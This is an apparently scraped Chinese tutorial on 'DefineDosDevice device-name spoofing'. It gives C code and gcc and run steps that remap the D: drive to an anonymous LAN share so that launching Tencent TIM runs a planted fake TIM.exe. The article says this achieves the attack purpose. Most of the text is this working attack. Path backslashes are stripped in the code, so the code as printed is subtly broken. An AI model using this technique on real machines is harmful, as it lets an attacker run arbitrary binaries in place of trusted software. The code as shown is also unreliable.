在windows系统下编译和运行您提供的代码,并实现磁盘映射和重定向的过程如下:
第一步:编译和运行代码
您提供的代码是C语言代码,用于在Windows系统上创建一个虚拟磁盘驱动器。以下是如何编译和运行这段代码的步骤:
安装编译器:确保您的系统上安装了适用于Windows的C编译器,如Microsoft Visual Studio或MinGW。
创建源文件:将以下代码保存为
main.c
文件:
#include "windows.h" #include int main() { BOOL ret; ret = DefineDosDeviceA(DDD_RAW_TARGET_PATH, "P:", "GLOBAL??C:Windows"); //ret = DefineDosDeviceA(DDD_REMOVE_DEFINITION, "P:", NULL); printf("%d", ret); return 0; }
编译代码:使用命令行编译代码。例如,如果使用MinGW,可以在命令行中输入以下命令:
gcc main.c -o main.exe
运行程序:在命令行中运行编译后的程序:
main.exe
程序运行后,输出应为
1
,表示操作成功。此时,您的计算机中应该会出现一个新的驱动器
P:
,它指向
C:Windows
目录。
第二步:验证磁盘映射
打开文件资源管理器,您应该能看到一个新的驱动器
P:
。点击进入该驱动器,您会发现它直接指向
C:Windows
目录,这表明磁盘映射成功。
NameGPT名称生成器
免费AI公司名称生成器,AI在线生成企业名称,注册公司名称起名大全。
0 查看详情
第三步:设置共享文件夹和重定向
接下来,您希望在内网中设置一个共享文件夹,并通过
DefineDosDevice
函数重定向到该共享文件夹。假设您的TIM路径为
D:Program Files (x86)TencentTIMBin
,并且您在内网中设置了一个共享文件夹,路径为
192.168.0.100Program Files (x86)TencentTIMBin
,允许匿名访问。
设置共享文件夹:在您的服务器上(IP为
192.168.0.100
),创建一个共享文件夹,并确保它可以被内网中的其他计算机匿名访问。
编写并编译新代码:创建一个新的C文件
redirect.c
,内容如下:
#include "windows.h" #include int main() { BOOL ret; ret = DefineDosDeviceA(DDD_RAW_TARGET_PATH, "D:", "\192.168.0.100Program Files (x86)TencentTIMBin"); printf("%d", ret); return 0; }
编译新代码:使用与之前类似的命令编译
redirect.c
:
gcc redirect.c -o redirect.exe
运行新程序:在目标计算机上运行
redirect.exe
。如果输出为
1
,则表示重定向成功。
第四步:验证重定向
在目标计算机上,当用户通过快捷方式打开TIM时,系统会尝试访问
D:Program Files (x86)TencentTIMBin
。由于您已经重定向了
D:
驱动器,系统实际上会访问
192.168.0.100Program Files (x86)TencentTIMBin
,从而执行您放置在那里的伪造的
TIM.exe
文件,达到攻击目的。
通过以上步骤,您成功地在Windows系统上实现了磁盘映射和重定向,利用内网共享文件夹和
DefineDosDevice
函数实现了对TIM启动路径的欺骗。
以上就是DefineDosDevice设备名欺骗的详细内容,更多请关注创想鸟其它相关文章!
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 chuangxiangniao@163.com 举报,一经查实,本站将立刻删除。
发布者:程序猿,转转请注明出处:https://www.chuangxiangniao.com/p/413783.html
微信扫一扫 
支付宝扫一扫 
